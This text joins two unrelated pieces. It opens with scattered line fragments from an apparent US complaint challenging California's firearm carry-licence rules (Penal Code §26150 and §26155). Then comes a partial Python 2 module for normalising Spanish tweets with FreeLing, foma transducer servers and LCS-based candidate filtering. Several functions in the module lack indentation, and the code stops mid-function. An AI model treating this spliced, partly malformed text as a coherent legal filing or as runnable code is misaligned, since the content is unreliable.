1 forth herein and in Plaintiffs’ Prayer for relief.
16 forth herein and in Plaintiffs’ Prayer for relief.
7 forth herein and in Plaintiffs’ Prayer for relief.
justification for the constitutional violations detailed herein.
24 forth herein and in Plaintiffs’ Prayer for relief.
15 forth herein and in Plaintiffs’ Prayer for relief.
26 speculative beliefs and ideas having no actual effect on a legitimate governmental interest.
without the opportunity to be heard.
interference with, and deprivation of, the full use and enjoyment of Plaintiffs’ property.
defense in public is a core and fundamental right protected by the Second Amendment.
1 abiding individuals for self-defense is facially unconstitutional and as applied to Plaintiffs.
applied to Plaintiffs as it violates the Second Amendment.
8 applied to Plaintiffs as it violates the Second Amendment.
right protected by the Second, Fourth and Fourteenth Amendments.
15 are facially unconstitutional and as applied to Plaintiffs.
23 the Dormant Commerce Clause.
and the Dormant Commerce Clause.
2 carrying a firearm in public for self-defense.
7 for in California Penal Codes §26150 and §26155.
California Penal Codes §26150 and §26155.
16 licenses as provided for in California Penal Codes §26150 and §26155.
population of the county as provided for in California Penal Codes §26150 and §26155.
25 openly carrying loaded and/or unloaded firearms.
2 their firearm in public as provided for in California Penal Codes §26150 and §26155.
7 and other law-abiding individuals to openly carry a firearm in public for self-defense.
firearm in public for self-defense.
16 20. Any such further or alternative relief as the Court deems just and proper.
|
# -*- coding: iso-8859-15 -*-
"""This is the main program of the Python project.
To use this program, please check the document "/docs/usage.rst".
"""
import difflib, multiprocessing, os, re, socket, subprocess, threading,\
xml.etree.ElementTree as ET
import kenlm, numpy as np, psutil, py_common_subseq
from sklearn.grid_search import ParameterGrid
from unidecode import unidecode
from timeout import Timeout
# Directory of this module; all relative resources are resolved against it.
CURRENT_PATH = os.path.dirname(os.path.abspath(__file__))
###############################
# read the configuration file #
###############################
# general.xml is read positionally, so element order matters — presumably
# section 0 = FreeLing, 1 = foma, 2 = system; verify against config/general.xml.
config = ET.parse(CURRENT_PATH + '/config/general.xml').getroot()
FREELING_PORT = config[0][0].text  # port of the FreeLing analyzer server
FOMA_PATH = config[1][0].text.rstrip('/')  # foma install dir, no trailing '/'
IP_ADDRESS = config[1][1].text  # host where the flookup services listen
SYSTEM_USER = config[2][0].text  # OS user that owns analyzer/flookup processes
# Worker count for the FreeLing server, kept as a string for Popen.
# Presumably config[2][1] is a CPU count (2*n+1 heuristic) — TODO confirm.
NUM_WORKERS = '%i' % (2 * int(config[2][1].text) + 1)
config = None  # drop the parsed XML tree; only the extracted values are kept
##########################
# other config variables #
##########################
# Compiled foma transducers, each served over UDP by a flookup process:
# short name -> [path to .bin file, service host, service port]
# (see _switch_flookup_server / _foma_string_lookup).
TRANSDUCERS_PATH = CURRENT_PATH + '/datasets/transducers/bin'
TRANSDUCERS = {
    'es-dicc':
        [TRANSDUCERS_PATH + '/es-dicc.bin', IP_ADDRESS, '60962'],
    'pnd-gazetteer':
        [TRANSDUCERS_PATH + '/PND-Gazetteer.bin', IP_ADDRESS, '60963'],
    'primary_variants':
        [TRANSDUCERS_PATH + '/primary_variants.bin', IP_ADDRESS, '60964'],
    'dictionary_lookup':
        [TRANSDUCERS_PATH + '/dictionary_lookup.bin', IP_ADDRESS, '60965'],
    'secondary_variants-dicc':
        [TRANSDUCERS_PATH + '/secondary_variants-Dicc.bin', IP_ADDRESS, '60966'],
    'es-verbal-forms-fonemas':
        [TRANSDUCERS_PATH + '/es-verbal-forms-fonemas.bin', IP_ADDRESS, '60967'],
    'es-diminutives-fonemas':
        [TRANSDUCERS_PATH + '/es-diminutives-fonemas.bin', IP_ADDRESS, '60968'],
    'pnd-gazetteer-fonemas':
        [TRANSDUCERS_PATH + '/PND-gazetteer-fonemas.bin', IP_ADDRESS, '60969'],
    'tertiary_variants-dicc':
        [TRANSDUCERS_PATH + '/tertiary_variants-Dicc.bin', IP_ADDRESS, '60970'],
    'tertiary_variants-pnd':
        [TRANSDUCERS_PATH + '/tertiary_variants-PND.bin', IP_ADDRESS, '60971'],
    'pnd-gazetteer-case':
        [TRANSDUCERS_PATH + '/PND-gazetteer-CaSe.bin', IP_ADDRESS, '60972'],
    'iv-candidates-fonemas':
        [TRANSDUCERS_PATH + '/IV-candidates-fonemas.bin', IP_ADDRESS, '60973'],
    'split-words':
        [TRANSDUCERS_PATH + '/split-words.bin', IP_ADDRESS, '60974'],
    'length_normalisation':
        [TRANSDUCERS_PATH + '/length_normalisation.bin', IP_ADDRESS, '60982'],
    'length_normalisation-2':
        [TRANSDUCERS_PATH + '/length_normalisation-2.bin', IP_ADDRESS, '60983'],
    'phonology':
        [TRANSDUCERS_PATH + '/phonology.bin', IP_ADDRESS, '60984'],
    'other-changes':
        [TRANSDUCERS_PATH + '/other-changes.bin', IP_ADDRESS, '60985'],
    'remove_enclitic':
        [TRANSDUCERS_PATH + '/remove_enclitic.bin', IP_ADDRESS, '61002'],
    'accentuate_enclitic':
        [TRANSDUCERS_PATH + '/accentuate_enclitic.bin', IP_ADDRESS, '61003'],
    'remove_mente':
        [TRANSDUCERS_PATH + '/remove_mente.bin', IP_ADDRESS, '61004']}
# Binary KenLM language-model files.
CORPORA = {
    'eswiki-corpus-3-grams':
        CURRENT_PATH + '/datasets/eswiki/corpora/eswiki-corpus-3-grams.bin'}
####################
# global variables #
####################
# \xe1\xe9\xed\xf3\xfa = accented vowels, \xfc = u-umlaut, \xf1 = n-tilde,
# i.e. the Spanish alphabet letters beyond ASCII a-z.
ALPHABET = re.compile(u'''[a-z\xe1\xe9\xed\xf3\xfa\xfc\xf1]''', re.I|re.U)
# Vowels including their accented forms.
VOWELS_RE = re.compile(u'''[aeiou\xe1\xe9\xed\xf3\xfa\xfc]''', re.I|re.U)
ACCENTED_VOWELS_RE = re.compile(u'''[\xe1\xe9\xed\xf3\xfa]''', re.I|re.U)
# Whitelists of valid one-/two-letter Spanish words, used when validating
# candidate word splits.  The 'xx'.decode('utf-8') calls are the Python 2
# idiom for writing accented unicode literals in a non-UTF-8 source file.
ONE_LETTER_WORDS = [u'a', u'e', u'o', u'u', u'y']
TWO_LETTER_WORDS = [u'ah', u'al', u'ay',
    u'da', u'de', 'dé'.decode('utf-8'), u'di', 'dí'.decode('utf-8'),
    u'eh', u'el', 'él'.decode('utf-8'), u'en', u'es', u'ex',
    u'fe',
    u'ha', u'he',
    u'id', u'ir',
    u'ja', u'je', u'ji', u'jo', u'ju',
    u'la', u'le', u'lo',
    u'me', u'mi', 'mí'.decode('utf-8'),
    u'ni', u'no',
    u'oh', 'oí'.decode('utf-8'), u'ok', u'os',
    u'se', 'sé'.decode('utf-8'), u'si', 'sí'.decode('utf-8'), u'su',
    u'te', 'té'.decode('utf-8'), u'ti', u'tu', 'tú'.decode('utf-8'),
    u'uf', u'uh', u'un', u'uy',
    u'va', u've', 'vé'.decode('utf-8'), u'vi',
    u'ya', u'yo']
# Module-wide lock; its acquisition sites are not in this part of the file.
LOCK = threading.Lock()
def _to_unicode(token):
    """Return *token* as unicode, decoding UTF-8 byte strings if needed."""
    if isinstance(token, unicode):
        return token
    return token.decode('utf-8')
def _to_str(token):
return token.encode('utf-8') if not isinstance(token, str) else token
def _write_in_file(fname, content, mode='w', makedirs_recursive=True):
dir_ = '/'.join(fname.split('/')[:-1])
if not os.path.isdir(dir_) and makedirs_recursive:
os.makedirs(dir_)
with open(fname, mode) as f:
f.write(content)
def _deaccent(word):
    '''Remove accent marks from the vowels of *word*.

    The input is decoded to unicode first; the result is a unicode string
    with accented vowels (and u-umlaut) replaced by their plain forms.
    '''
    word = _to_unicode(word)
    # \xe1\xe9\xed\xf3\xfa are the accented a-e-i-o-u; \xfc is u-umlaut.
    remove_accents = {
        u'\xe1': u'a',
        u'\xe9': u'e',
        u'\xed': u'i',
        u'\xf3': u'o',
        u'\xfa': u'u',
        u'\xfc': u'u'}
    # dict.get replaces the original "s in remove_accents.keys()" test,
    # which on Py2 builds a list and scans it for every character.
    # Joining unicode chars already yields unicode, so the original's
    # redundant _to_unicode() wrapper around the join is dropped.
    return u''.join(remove_accents.get(s, s) for s in word)
def _normalize_unknown_symbols(token):
    """Transliterate unrecognised symbols (letters) to ASCII.

    Characters matching the Spanish ALPHABET are kept as-is; anything else
    is passed through unidecode.
    """
    normalized = []
    for symbol in _to_unicode(token):
        if ALPHABET.match(symbol):
            normalized.append(symbol)
        else:
            normalized.append(_to_unicode(unidecode(symbol)))
    return ''.join(normalized)
def _switch_freeling_server(
        mode='on', initialization_command='default', port=FREELING_PORT,
        workers=NUM_WORKERS):
    '''Start/stop the FreeLing analysis service.

    params:
        mode: str
            'on' ensures the server is running; 'off' kills it.
        initialization_command: str | list
            FreeLing launch configuration. By default, the one provided by
            the TweetNorm 2013 workshop.
            NOTE: this parameter exists to allow initializing FreeLing from
            other files.
        port: int
            port on which the FreeLing service will run.
        workers: str
            number of FreeLing workers, passed as a command-line argument.
    NOTE: the process is started and stopped under the SYSTEM_USER account.
    '''
    # Look for an already-running "analyzer" process owned by SYSTEM_USER
    # and bound to *port*.
    pid = None
    for process in psutil.process_iter():
        cmd_line = process.cmdline()
        # cmd_line[-4] is the port with the launch arguments used below
        # (..., '--port', port, '--workers', workers, '&').
        # NOTE(review): a shorter analyzer command line passing the first
        # two checks would raise IndexError here — confirm acceptable.
        if (process.username() == SYSTEM_USER and len(cmd_line) > 1
                and re.search('analyzer$', cmd_line[0], re.I)
                and (cmd_line[-4] == port)):
            pid = process.pid
            break
    if pid is not None and mode == 'off':
        psutil.Process(pid=pid).kill()
    elif pid is None and mode == 'on':
        if (isinstance(initialization_command, str)
                and initialization_command == 'default'):
            # NOTE(review): the trailing '&' is passed to the analyzer as a
            # literal argument (Popen uses no shell); presumably a leftover
            # from a shell command line.
            subprocess.Popen(['analyze', '-f', CURRENT_PATH + '/config/es.cfg',
                '--flush', '--ftok', CURRENT_PATH + '/config/es-twit-tok.dat',
                '--usr', '--fmap', CURRENT_PATH + '/config/es-twit-map.dat',
                '--outlv', 'morfo', '--noprob', '--noloc',
                '--server', '--port', port, '--workers', workers, '&'])
        elif (isinstance(initialization_command, list)
                and len(initialization_command) > 0):
            subprocess.Popen(initialization_command)
        else:
            raise Exception('No ha especificado un comando de inicialización válido')
def _analyze_morphologically(text, port=FREELING_PORT):
    '''Morphologically analyze the text of a tweet.

    Used to identify out-of-vocabulary words.  The FreeLing configuration
    is the one provided by the TweetNorm 2013 workshop organizers, and the
    analysis runs through the FreeLing server exposed on *port*
    (see _switch_freeling_server), via the analyzer_client tool.

    Returns a list of sentences; each sentence is a list of
    [form, lemma, tag] unicode triples (lemma and tag are empty when a
    FreeLing output line could not be split into three fields).
    '''
    text = _to_str(text)
    # Randomized temp-file basename to avoid collisions between workers.
    fname = CURRENT_PATH + '/.tmp/FreeLing-%03d%s%05d' % (
        np.random.randint(0, 100),
        '-' if np.random.randint(0, 2) == 1 else '',
        np.random.randint(0, 100000))
    _write_in_file(fname + '.txt', text)
    # Fix: manage the handles with "with" — the original passed unclosed
    # open() objects straight into subprocess.call and leaked them.
    with open(fname + '.txt') as client_in, open(fname + '.morpho', 'w') as client_out:
        subprocess.call(["analyzer_client", port],
                        stdin=client_in,
                        stdout=client_out)
    sentences = []
    sentence = []
    with open(fname + '.morpho') as foutput:
        for line in foutput:
            line = line.rstrip('\n')
            if len(line) == 0:
                # Blank line = sentence boundary in FreeLing's output.
                sentences.append(sentence)
                sentence = []
                continue
            try:
                form, lemma, tag = re.split('\s+', line)[:3]
                sentence.append([
                    form.decode('utf-8'), lemma.decode('utf-8'),
                    tag.decode('utf-8')])
            except Exception:
                # Fix: was a bare "except:", which also swallowed
                # KeyboardInterrupt/SystemExit.  Lines without the expected
                # three fields keep only the raw form.
                form = line
                sentence.append([form.decode('utf-8'), '', ''])
    os.remove(fname + '.txt')
    os.remove(fname + '.morpho')
    return sentences
def _check_flookup_server_status(transducer):
    """Check whether the transducer is running as a flookup service.

    params:
        transducer: str
            Name of the transducer; may be the full path or part of it.
    Returns the pid of the flookup process serving the transducer, or
    None if no matching process is found.
    NOTE: the processes must have been started by the SYSTEM_USER account.
    """
    pid = None
    transducer = _to_str(transducer)
    for process in psutil.process_iter():
        cmd_line = process.cmdline()
        # With the launch arguments used in _switch_flookup_server
        # (..., transducer_path, '&'), the .bin path is cmd_line[-2].
        # NOTE(review): *transducer* is interpolated into the regex
        # unescaped, so names containing regex metacharacters (and the
        # unescaped '.' before "bin") match loosely — confirm acceptable.
        if (process.username() == SYSTEM_USER and len(cmd_line) > 1
                and re.search('flookup$', cmd_line[0], re.I)
                and re.search(transducer + '.bin', _to_str(cmd_line[-2]), re.I)):
            pid = process.pid
            break
    return pid
def _switch_flookup_server(
        transducer='all', mode='on', set_of_transducers=TRANSDUCERS):
    """Start or stop a transducer running as a flookup server.

    params:
        transducer: str
            name of the transducer, one of the keys of set_of_transducers.
            Defaults to 'all' (every transducer).
        mode: str
            two possible values: 'on' to start the server, 'off' to stop it.
        set_of_transducers: dict
            set of transducers.
            NOTE: this parameter exists to allow running transducers that
            are not declared in this file.
    NOTE: the processes must run under the SYSTEM_USER account.
    """
    transducer = _to_str(transducer).lower()
    if transducer != 'all' and transducer not in set_of_transducers.keys():
        raise Exception('Transductor %s no reconocido' % transducer)
    elif mode not in ['on', 'off']:
        raise Exception('La acción definida no es válida')
    if transducer == 'all':
        # Fan out: recursively switch every transducer, 3 at a time.
        pool = multiprocessing.Pool(processes=3)
        for t in set_of_transducers.keys():
            pool.apply_async(
                _switch_flookup_server,
                [t, mode, set_of_transducers])
        pool.close()
        pool.join()
        return
    pid = _check_flookup_server_status(transducer)
    transducer = set_of_transducers[transducer]  # now [path, host, port]
    if mode == 'on':
        if pid is None:
            # -S runs flookup as a server on -A host / -P port; see the
            # foma/flookup docs for the -i/-x flags.
            # NOTE(review): the trailing '&' is passed to flookup as a
            # literal argument (Popen uses no shell); presumably a leftover
            # from a shell command line.
            subprocess.Popen([FOMA_PATH + '/flookup', '-S',
                '-A', transducer[1], '-P', transducer[2],
                '-i', '-x', transducer[0], '&'])
    else:
        if pid is not None:
            process = psutil.Process(pid=pid)
            process.kill()
def _foma_string_lookup(token, transducer, set_of_transducers=TRANSDUCERS):
    '''Analyze *token* through the specified transducer.

    params:
        token: str
            character string to be analyzed.
        transducer: str
            transducer that analyzes the token. May be a full filesystem
            path or one of the keys of set_of_transducers.
        set_of_transducers: dict
            set of transducers ([path, host, port] per key).
    NOTE: if the transducer is not a filesystem path but one of the keys of
    set_of_transducers, the analysis goes through a flookup service, which
    must have been started beforehand (see _switch_flookup_server).
    Returns the analyses as a list of unicode strings; empty lines and the
    '?+' no-match marker are filtered out.
    '''
    use_server = False
    if transducer.lower() in set_of_transducers.keys():
        use_server = True
    elif not os.path.isfile(transducer):
        raise Exception('El transductor especificado no existe')
    token = _to_str(token)
    result = []
    if not use_server:
        # One-shot mode: write the token to a randomized temp file and run
        # the flookup binary over it.
        fname_input = '%s-%03d%s%05d.txt' % (
            CURRENT_PATH + '/.tmp/flookup',
            np.random.randint(0, 100),
            '-' if np.random.randint(0,2) == 1 else '_',
            np.random.randint(0, 100000))
        _write_in_file(fname_input, token, mode='w')
        fname_output = fname_input.replace('.txt', '.out')
        # NOTE(review): these open() handles are never closed explicitly;
        # they are left to the garbage collector.
        subprocess.call([FOMA_PATH + '/flookup', '-i', '-x', transducer],
            stdin=open(fname_input),
            stdout=open(fname_output, 'w'))
        with open(fname_output) as finput:
            for line in finput:
                line = line.rstrip('\n')
                if len(line.strip()) > 0 and line != '?+':
                    result.append(_to_unicode(line))
        os.remove(fname_input)
        os.remove(fname_output)
    else:
        # Server mode: one UDP datagram per token; the reply carries all
        # analyses separated by newlines.
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        transducer = set_of_transducers[transducer.lower()]
        sock.sendto(token, (transducer[1], int(transducer[2])))
        # NOTE(review): replies longer than 4096 bytes would be truncated.
        data, addr = sock.recvfrom(4096)
        result = [_to_unicode(d)
            for d in data.split('\n')
            if len(d.strip()) > 0 and d != '?+']
        sock.close()
    return result
def _transducers_cascade(token, transducers, set_of_transducers=TRANSDUCERS):
    """Run a cascade of foma transducers over *token*.

    Although the cascade could be implemented directly in foma, running the
    stages sequentially from here can be cheaper.

    params:
        token: str, or list of str — for a list, every element is analyzed
            and the results are concatenated.
        transducers: ordered names of the transducers to apply.
        set_of_transducers: dict of available transducers.
    Returns the de-duplicated, sorted outputs of the final stage.
    """
    if isinstance(token, list):
        concatenated = []
        for single_token in token:
            concatenated += _transducers_cascade(
                single_token, transducers, set_of_transducers)
        return concatenated
    result = []
    for i, transducer in enumerate(transducers):
        # Stage 0 consumes the raw token; later stages consume the output
        # of the previous stage.
        stage_input = [token] if i == 0 else result[i - 1]
        stage_output = [
            analyzed
            for current in stage_input
            for analyzed in _foma_string_lookup(
                current, transducer, set_of_transducers)
            if len(analyzed.strip()) > 0 and analyzed != '?+']
        result.append(np.unique(stage_output).tolist())
    return result[i]
def _recover_original_word_case_from_type(word, case_type):
    """Reapply upper/lower casing to *word* according to *case_type*.

    case_type 0 -> all lowercase; 1 -> first letter capitalized; any other
    value -> all uppercase (see _get_case_type_in_token).
    """
    lowered = _to_unicode(word).lower()
    if case_type == 1:
        return lowered[0].upper() + lowered[1:]
    if case_type == 0:
        return lowered
    return lowered.upper()
def _get_case_type_in_token(token):
    """Classify how a token is cased.

    Returns an integer:
        0 -> token is entirely lowercase.
        1 -> only the first letter is uppercase.
        2 -> token is mostly (or fully) uppercase.
    """
    token = _to_unicode(token)
    if token.lower() == token:
        return 0
    if len(token) > 1 and token == (token[0].upper() + token[1:].lower()):
        return 1
    return 2
def _select_non_fused_words(candidates):
    """Select the splits with the fewest words.

    The word separator is the character "_"; i.e. the candidates with the
    fewest inserted "_" are selected.
    NOTE: a candidate is discarded if its last word is a single letter, or
    if any of its words equals "ll".
    Candidates with exactly one word more than the established minimum are
    also accepted, if and only if that extra word has length one.
    """
    final_candidates = []
    final_candidates_aux = []
    # Number of words per candidate split.
    idx = np.array([len(c.split('_')) for c in candidates], dtype=int)
    lengths = []
    # Only consider splits with the minimum word count, or one more.
    for i in np.where(idx <= (idx.min() + 1))[0]:
        words = candidates[i].split('_')
        words_length = []
        ill_formed_word = False
        for j, word in enumerate(words):
            word = _to_unicode(word)
            words_length.append(len(word))
            # Reject the split when any word is ill-formed:
            #  - "ll" on its own;
            #  - a final word shorter than 2 letters;
            #  - a 2-letter word not in the accepted whitelist;
            #  - a leading conjunction e/o/u;
            #  - conjunctions e/o/u misused before the following word
            #    (e.g. Spanish uses "e" before i-, "u" before o-);
            #  - a vowel-less word other than "y".
            # NOTE: the words[j+1] accesses are safe — a last word of
            # length 1 is already rejected by the earlier clause, so the
            # e/o/u clauses only fire for non-final positions.
            if (word == u'll'
                    or (j == (len(words) - 1) and len(word) < 2)
                    or (len(word) == 2 and word not in TWO_LETTER_WORDS)
                    or (j == 0 and word in [u'e', u'o', u'u'])
                    or (word == 'e' and words[j+1].lower()[0] != u'i')
                    or (word == 'o' and words[j+1].lower()[0] == u'o')
                    or (word == 'u' and words[j+1].lower()[0] != u'o')
                    or (not VOWELS_RE.search(word) and word != u'y')):
                ill_formed_word = True
                break
        if not ill_formed_word and len(words) == idx.min():
            # Minimum-size split: accept and remember its length profile.
            lengths.append(words_length)
            final_candidates.append(candidates[i])
        elif not ill_formed_word:
            # One word above the minimum: decide later.
            final_candidates_aux.append(candidates[i])
    # Accept a min+1 split only when it differs from some accepted minimal
    # split by splitting one word into two, one of which has length 1.
    for candidate in final_candidates_aux:
        words_length = [len(_to_unicode(w)) for w in candidate.split('_')]
        ill_formed_word = []
        for length in lengths:
            j = 0
            for l in length:
                if l != words_length[j]:
                    # Mismatch: tolerated only when two adjacent words (one
                    # of length 1) merge back into the reference word.
                    if ((words_length[j]==1 or words_length[j+1]==1)
                            and (words_length[j]+words_length[j+1])==l):
                        ill_formed_word.append(0)
                    else:
                        ill_formed_word.append(1)
                    break
                j += 1
        # Keep the candidate when every reference was compared and at least
        # one comparison was acceptable.
        if (len(ill_formed_word) == len(lengths)
                and sum(ill_formed_word) < len(lengths)):
            final_candidates.append(candidate)
    return final_candidates
def _find_longest_common_substring(string_1, string_2):
    """Find the longest common substring of two strings.

    Also returns the ratio: length of the longest common substring divided
    by the length of the longer of the two (lowercased, de-accented) inputs.

    Returns a 4-tuple: (substring or None, ratio, start in string_1,
    start in string_2).
    """
    string_1 = _deaccent(_to_unicode(string_1).lower())
    string_2 = _deaccent(_to_unicode(string_2).lower())
    longer = max(len(string_1), len(string_2))
    matcher = difflib.SequenceMatcher(None, string_1, string_2)
    match = matcher.find_longest_match(0, len(string_1), 0, len(string_2))
    if match.size == 0:
        return None, .0, match.a, match.b
    substring = string_1[match.a:match.a + match.size]
    return substring, len(substring) / float(longer), match.a, match.b
def _compute_longest_common_subsequence_ratio(
        oov_word, iv_word, recursion=False, normalise_lengthening=True):
    """Compute the LCS ratio between two given words.

    The LCS ratio is computed over the longer of the two strings
    (oov_word vs. iv_word).
    [REF] Lexical Normalisation of Short Text Messages: Makn Sens a #twitter
    NOTE: accents are removed so they do not affect the LCSR computation.

    params:
        oov_word / iv_word: the out-of-vocabulary word and the in-vocabulary
            candidate to compare.
        recursion: internal flag; the public (False) entry point first
            expands oov_word via the 'other-changes' transducer and returns
            the best ratio among the expansions.
        normalise_lengthening: when True, character repetitions in oov_word
            are first normalised to one/two repetitions.
    """
    if not recursion:
        # Public entry point: expand the OOV word and take the best ratio.
        oov_word = _deaccent(_to_unicode(oov_word).lower())
        iv_word = _deaccent(_to_unicode(iv_word).lower())
        try:
            # Guard against a hung flookup server.
            with Timeout(2):
                oov_words = _foma_string_lookup(oov_word, 'other-changes')
        except Timeout.Timeout:
            # Fall back to the word itself and restart the server.
            oov_words = [oov_word]
            _switch_flookup_server('other-changes', mode='on')
        LCSR_values = np.zeros(len(oov_words), dtype=float)
        for i, string in enumerate(oov_words):
            LCSR_values[i] = _compute_longest_common_subsequence_ratio(
                string, iv_word, recursion=True,
                normalise_lengthening=normalise_lengthening)
        return LCSR_values.max()
    oov_word = _deaccent(_to_unicode(oov_word).lower())
    iv_word = _deaccent(_to_unicode(iv_word).lower())
    normalised_variants = [oov_word]
    if normalise_lengthening:
        normalised_variants = _foma_string_lookup(
            oov_word, 'length_normalisation-2')
    LCSR = 0.
    # Normalisation to one or two character repetitions.
    for normalised_f in normalised_variants:
        normalised_f = _to_unicode(normalised_f)
        max_length = np.max(
            np.array([len(normalised_f), len(iv_word)], dtype=float))
        # All common subsequences; keep the best length ratio.
        common_subseq = py_common_subseq.find_common_subsequences(
            normalised_f, iv_word)
        for subseq in common_subseq:
            ratio = len(subseq) / max_length
            LCSR = ratio if ratio > LCSR else LCSR
    return LCSR
def _filter_target_words_by_length(target_words):
    """Filter candidate words according to their length.

    Specifically: when a candidate starts with a lowercase letter (i.e. it
    was recovered from the Spanish dictionary) and its length is below
    three, it must appear in the whitelist of accepted one- or two-letter
    words to be kept.
    """
    kept = []
    for candidate in target_words:
        candidate = _to_unicode(candidate)
        is_short_lowercase = (len(candidate) in (1, 2)
                              and candidate[0] == candidate[0].lower())
        if not is_short_lowercase:
            kept.append(candidate)
        elif len(candidate) == 1 and candidate in ONE_LETTER_WORDS:
            kept.append(candidate)
        elif candidate in TWO_LETTER_WORDS:
            kept.append(candidate)
    return kept
def _filter_target_words_based_on_LCSR(oov_word, target_words, LCSR):
    """Filter out target words whose LCSR is below the required threshold.

    Mutates and returns `target_words`. Indices to remove are collected
    first and popped in reverse order so earlier removals do not shift the
    indices still pending — the same collect-then-pop pattern used by
    `_filter_out_acronyms`. (The original hung the removal loop on an
    `else:`; as a no-break `for`/`else` it always ran after the scan, which
    is exactly what this flattened, unambiguous form does.)

    params:
        oov_word: the out-of-vocabulary word being normalised.
        target_words: list of candidate corrections (mutated in place).
        LCSR: minimum acceptable longest-common-subsequence ratio.
    """
    remove_idx = []
    for i, target in enumerate(target_words):
        ratio = _compute_longest_common_subsequence_ratio(
            oov_word, target)
        if ratio < LCSR:
            remove_idx.append(i)
    for i in reversed(remove_idx):
        target_words.pop(i)
    return target_words
def _check_affixes(word, normalised_variants, affix=None, what_affix=None):
    '''Extract common prefixes and suffixes.

    params:
        word: str
            word not yet normalised (with respect to character repetition).
        normalised_variants: array (of str elements)
            variants normalised to at most one or two character repetitions.
        affix: str
            kind of search to perform: 'suffix' or 'prefix'.
        what_affix: str
            which specific search to perform for the given kind.

    When affix is None, all known suffix searches (enclitic, -mente,
    diminutives) are run and their results merged.
    '''
    if affix is None:
        # Run every supported search and merge the unique results.
        searches = [
            ['suffix', 'enclitic'],
            ['suffix', 'mente'],
            ['suffix', 'diminutives']]
        target_words = []
        for affix, what_affix in searches:
            target_words += _check_affixes(word, normalised_variants,
                                           affix, what_affix)
        return np.unique(target_words).tolist()
    target_words = []
    if affix == 'suffix' and what_affix == 'enclitic':
        # Identify which variants correspond to a candidate verbal form by
        # removing hypothetical enclitic pronouns.
        final_verbal_form = [
            '',     # verbal form
            .0,     # Longest Common Substring ratio
            '',     # enclitic
            False,  # whether the verbal form's final "s" was dropped
                    # (vamos+nos -> vámonos)
        ]
        for verbal_form in _foma_string_lookup(word, 'remove_enclitic'):
            if verbal_form not in normalised_variants:
                # Compare the candidate verbal form with the normalised
                # variants, to determine which one it is most similar to
                # and which enclitic was removed.
                for normalised_f in normalised_variants:
                    longest_match = _find_longest_common_substring(
                        verbal_form, normalised_f)
                    # Only accept matches anchored at the start of both.
                    if (longest_match[1] == .0 or
                            longest_match[2] != 0 or longest_match[3] != 0):
                        continue
                    enclitic = normalised_f[len(longest_match[0]):]
                    if longest_match[1] > final_verbal_form[1]:
                        final_verbal_form = [longest_match[0],
                                             longest_match[1], enclitic,
                                             False]
        if final_verbal_form[1] != .0:
            # Perform grapheme/phoneme conversion of the verbal form.
            if final_verbal_form[0].endswith('mo'):
                # Restore the dropped "s" (vámonos case).
                final_verbal_form[0] = final_verbal_form[0] + u's'
                final_verbal_form[3] = True
            verbal_forms_from_fonema = _transducers_cascade(
                final_verbal_form[0],
                ['length_normalisation-2',
                 'phonology',
                 'es-verbal-forms-fonemas'])
            for verbal_form in verbal_forms_from_fonema:
                _verbal_form = verbal_form
                if final_verbal_form[3]:
                    # Drop the final "s" again before re-attaching.
                    verbal_form = verbal_form[:-1]
                verbal_form = verbal_form + final_verbal_form[2]
                accentuated_forms = np.unique(
                    _foma_string_lookup(verbal_form,
                                        'accentuate_enclitic')).tolist()
                # Clean-up: discard forms with two or more accent marks.
                remove_idx = []
                non_accented_form = u''
                for i, accentuated_form in enumerate(accentuated_forms):
                    accented_vowels = ACCENTED_VOWELS_RE.findall(
                        accentuated_form)
                    if len(accented_vowels) == 1:
                        target_words.append(accentuated_form)
                    elif len(accented_vowels) > 1:
                        remove_idx.append(i)
                    else:
                        non_accented_form = accentuated_form
                for i in reversed(remove_idx):
                    accentuated_forms.pop(i)
                if (len(target_words) == 0 and not final_verbal_form[3] and
                        (re.search(u'''[\xe1\xe9\xf3]i''', _verbal_form, re.U)
                         or re.search(u'''\xed[aeo]''', _verbal_form, re.U))):
                    # Keep the accented stem + enclitic as-is.
                    target_words.append(_verbal_form + final_verbal_form[2])
                else:
                    target_words.append(verbal_form)
                target_words.append(non_accented_form)
    elif affix == 'suffix' and what_affix == 'mente':
        # Search for the -mente suffix in the word and identify possible
        # base adjectives.
        adjectives = []
        for adjective in _foma_string_lookup(word, 'remove_mente'):
            if adjective not in normalised_variants:
                adjectives += _foma_string_lookup(
                    adjective, 'secondary_variants-dicc')
        if len(adjectives) != 0:
            # Column 0: best LCSR; column 1: longest-common-substring ratio.
            longest_match_ratios = np.zeros((len(adjectives), 2))
            for i, adjective in enumerate(adjectives):
                for normalised_f in normalised_variants:
                    if not re.search(u'(?:mente)$', normalised_f, re.U):
                        continue
                    normalised_f = re.sub(u'(?:mente)$', '',
                                          normalised_f, flags=re.U)
                    LCSR = _compute_longest_common_subsequence_ratio(
                        normalised_f, adjective,
                        recursion=False, normalise_lengthening=False)
                    if LCSR > longest_match_ratios[i,0]:
                        longest_match_ratios[i,0] = LCSR
                        longest_match_ratios[i,1] =\
                            _find_longest_common_substring(normalised_f,
                                                           adjective)[1]
            # Pick the adjective that maximises both measures when possible.
            idx_i = np.where(
                longest_match_ratios[:,0] == longest_match_ratios[:,0].max())[0]
            idx_j = np.where(
                longest_match_ratios[:,1] == longest_match_ratios[:,1].max())[0]
            intersect = np.intersect1d(idx_i, idx_j)
            if len(idx_i) == 1 or len(intersect) == 0:
                target_words.append(adjectives[idx_i[0]] + u'mente')
            else:
                target_words.append(adjectives[intersect[0]] + u'mente')
    elif affix == 'suffix' and what_affix == 'diminutives':
        # Each entry: [candidate string, description of applied changes],
        # where changes is None (as-is) or a '+'-joined list of edits to
        # re-apply after the phonetic round-trip.
        diminutives = []
        for normalised_f in normalised_variants:
            normalised_f = _deaccent(normalised_f)
            diminutives.append([normalised_f, None])
            if normalised_f.endswith(u'z'):
                # z -> s before plural handling (e.g. -ces/-z alternation).
                normalised_f = normalised_f[:-1] + u's'
            changes = []
            if normalised_f.endswith(u's'):
                # Strip plural "s".
                normalised_f = normalised_f[:-1]
                diminutives.append([normalised_f, u's'])
                changes.append(u's')
            elif normalised_f.endswith(u'tin'):
                # -tín diminutive: recover the -to base.
                diminutives.append([normalised_f[:-2] + u'o', u'in'])
            if re.search(r'i(?:ll|y)[ao]$', normalised_f, re.U):
                # -illa/-illo (or -iya/-iyo) -> -ita/-ito.
                normalised_f = re.sub(r'i(?:ll|y)([ao])$', r'it\1',
                                      normalised_f, flags=re.U)
                changes.append(u'll')
                diminutives.append([normalised_f, u'+'.join(changes)])
            if normalised_f.endswith(u'a'):
                # Also try the opposite gender ending.
